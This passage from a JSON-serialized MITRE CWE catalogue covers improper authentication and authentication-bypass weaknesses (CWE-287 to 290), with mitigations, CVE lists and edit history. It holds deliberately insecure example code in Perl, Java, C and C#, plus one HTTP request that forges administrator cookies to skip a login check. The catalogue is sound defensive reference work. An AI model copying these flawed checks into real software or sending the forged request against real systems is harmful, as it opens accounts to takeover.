Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an authentication framework or library such as the OWASP ESAPI Authentication feature."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to \\"remember\\" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the \\"Administrator\\" username, as recorded in the user cookie.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $q = new CGI;if ($q-&gt;cookie(\'loggedin\') ne \\"true\\") {}if ($q-&gt;cookie(\'user\') eq \\"Administrator\\") {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}else {}","xhtml:div":[{"#text":"ExitError(\\"Error: you need to log in first\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"# Set loggedin and user cookies.$q-&gt;cookie($q-&gt;cookie(","xhtml:br":["",""],"xhtml:div":[{"#text":"-name =&gt; \'loggedin\',-value =&gt; \'true\');","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"-name =&gt; \'user\',-value =&gt; $q-&gt;param(\'username\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"xhtml:br":""}},{"#text":"DoAdministratorTasks();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true[body of request]","xhtml:br":["","","",""]}}],"Body_Text":["Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as:","By setting the loggedin cookie to \\"true\\", the attacker bypasses the entire authentication check. By using the \\"Administrator\\" value in the user cookie, the attacker also gains privileges to administer the software."]},{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3421","Description":"login script for guestbook allows bypassing authentication by setting a \\"login_ok\\" parameter to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3421"},{"Reference":"CVE-2009-2382","Description":"admin script allows authentication bypass by setting a cookie value to \\"LOGGEDIN\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2382"},{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"},{"Reference":"CVE-2009-2213","Description":"product uses default \\"Allow\\" action, instead of default deny, leading to authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-2168","Description":"chain: redirect without exit (CWE-698) leads to resultant authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2168"},{"Reference":"CVE-2009-3107","Description":"product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3107"},{"Reference":"CVE-2009-1596","Description":"product does not properly implement a security-related configuration setting, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1596"},{"Reference":"CVE-2009-2422","Description":"authentication routine returns \\"nil\\" instead of \\"false\\" in some situations, allowing authentication bypass using an invalid username.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2422"},{"Reference":"CVE-2009-3232","Description":"authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3232"},{"Reference":"CVE-2009-3231","Description":"use of LDAP authentication with anonymous binds causes empty password to result in successful authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3231"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Functional_Areas":{"Functional_Area":"Authentication"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Error"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":1,"Entry_Name":"Insufficient Authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"115"}},{"attr":{"@_CAPEC_ID":"151"}},{"attr":{"@_CAPEC_ID":"194"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"593"}},{"attr":{"@_CAPEC_ID":"633"}},{"attr":{"@_CAPEC_ID":"650"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-237"}},{"attr":{"@_External_Reference_ID":"REF-238"}},{"attr":{"@_External_Reference_ID":"REF-239"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authentication&#34; Page 109"}}]},"Notes":{"Note":{"#text":"This can be resultant from SQL injection vulnerabilities and other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Issues","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Authentication","attr":{"@_Date":"2009-01-12"}}]}},"288":{"attr":{"@_ID":"288","@_Name":"Authentication Bypass Using an Alternate Path or Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product requires authentication, but the product has an alternate path or channel that does not require authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"420","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"425","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"This is often seen in web applications that assume that access to a particular CGI program can only be obtained through a \\"front\\" screen, when the supporting programs are directly accessible. But this problem is not just in web apps."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1179","Description":"Router allows remote attackers to read system logs without authentication by directly connecting to the login screen and typing certain control characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1179"},{"Reference":"CVE-1999-1454","Description":"Attackers with physical access to the machine may bypass the password prompt by pressing the ESC (Escape) key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1454"},{"Reference":"CVE-1999-1077","Description":"OS allows local attackers to bypass the password protection of idled sessions via the programmer\'s switch or CMD-PWR keyboard sequence, which brings up a debugger that the attacker can use to disable the lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1077"},{"Reference":"CVE-2003-0304","Description":"Direct request of installation file allows attacker to create administrator accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0304"},{"Reference":"CVE-2002-0870","Description":"Attackers may gain additional privileges by directly requesting the web management URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0870"},{"Reference":"CVE-2002-0066","Description":"Bypass authentication via direct request to named pipe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Alternate Path/Channel"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"665"}}]},"Notes":{"Note":{"#text":"overlaps Unprotected Alternate Channel","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Authentication Bypass by Alternate Path/Channel","attr":{"@_Date":"2008-09-09"}}}},"289":{"attr":{"@_ID":"289","@_Name":"Authentication Bypass by Alternate Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0317","Description":"Protection mechanism that restricts URL access can be bypassed using URL encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0317"},{"Reference":"CVE-2004-0847","Description":"Bypass of authentication for files using \\"\\\\\\" (backslash) or \\"%5C\\" (encoded backslash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by alternate name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues.","attr":{"@_Type":"Relationship"}},{"#text":"Alternate names are useful in data driven manipulation attacks, not just for authentication.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"290":{"attr":{"@_ID":"290","@_Name":"Authentication Bypass by Spoofing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"This weakness can allow an attacker to access resources which are not otherwise accessible without proper authentication."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code authenticates users.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sourceIP = request.getRemoteAddr();if (sourceIP != null &amp;&amp; sourceIP.equals(APPROVED_IP)) {}","xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism."},{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) &amp; secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by spoofing"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"476"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"667"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Spoofing and Identification&#34;, Page 72"}}},"Notes":{"Note":{"#text":"This can be resultant from insufficient verification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content 